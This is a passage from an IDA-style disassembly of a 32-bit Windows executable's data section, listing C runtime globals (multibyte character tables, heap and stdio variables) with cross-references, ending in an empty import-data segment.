dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
; int dword_40C424
dword_40C424 dd 4E4h ; DATA XREF: __ismbbkana�r _setSBCS+10�w ...
align 10h
dword_40C430 dd 4 dup(0) ; DATA XREF: _setSBCS+1F�o
; __setmbcp+162�o ...
byte_40C440 db 0 ; DATA XREF: _setSBUpLow:loc_4064C4�w
; _setSBUpLow:loc_4064E1�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh, 0
; void *dword_40C544
dword_40C544 dd 0 ; DATA XREF: ___sbh_heap_init+21�w
; ___sbh_free_block+21C�r ...
dword_40C548 dd 0 ; DATA XREF: .text:0040407F�r
; .text:004040C9�r ...
dword_40C54C dd 0 ; DATA XREF: .text:0040408F�r
; .text:loc_4040D3�r ...
dword_40C550 dd 0 ; DATA XREF: __heap_alloc+E�r
; __get_sbh_threshold+E�r ...
dword_40C554 dd 0 ; DATA XREF: ___sbh_heap_init+2F�w
; ___sbh_free_block+300�w ...
dword_40C558 dd 0 ; DATA XREF: ___sbh_heap_init+3C�w
; ___sbh_alloc_new_region+5�r ...
dword_40C55C dd 0 ; DATA XREF: ___sbh_free_block+229�r
; ___sbh_free_block+249�r ...
dword_40C560 dd 320000h ; DATA XREF: __heap_alloc+38�r
; _free+2A�r ...
dword_40C564 dd 1 ; DATA XREF: __heap_alloc�r
; __heap_alloc:loc_402211�r ...
dword_40C568 dd 321080h ; DATA XREF: _flsall:loc_402A0F�r
; ___initstdio+2B�w ...
dd 5 dup(0)
dword_40C580 dd 400h dup(0) ; DATA XREF: .data:off_40B068�o
; .data:0040B070�o
; size_t dword_40D580
dword_40D580 dd 200h ; DATA XREF: _flsall+9�r _flsall+56�r ...
dword_40D584 dd 20h ; DATA XREF: __read+B�r __ioinit+1F�w ...
dd 6 dup(0)
dword_40D5A0 dd 320650h ; DATA XREF: _ftell+57�r __filbuf+74�r ...
dword_40D5A4 dd 3Fh dup(0) ; DATA XREF: __ioinit+91�o
dword_40D6A0 dd 1 ; DATA XREF: .text:004028D0�o
; __setenvp+9F�w ...
dword_40D6A4 dd 32075Ch ; DATA XREF: _doexit+3E�r
; _doexit:loc_40265D�r ...
; void *dword_40D6A8
dword_40D6A8 dd 320758h ; DATA XREF: _doexit+34�r _doexit+5A�r ...
dword_40D6AC dd 1 ; DATA XREF: __wincmdln+4�r
; __setenvp+3�r ...
dword_40D6B0 dd 0 ; DATA XREF: __cinit�r
dword_40D6B4 dd 142340h ; DATA XREF: start+112�w
; __wincmdln:loc_403B3D�r ...
_data ends
; Section 4. (virtual address 0000E000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0000D800
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 40E000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start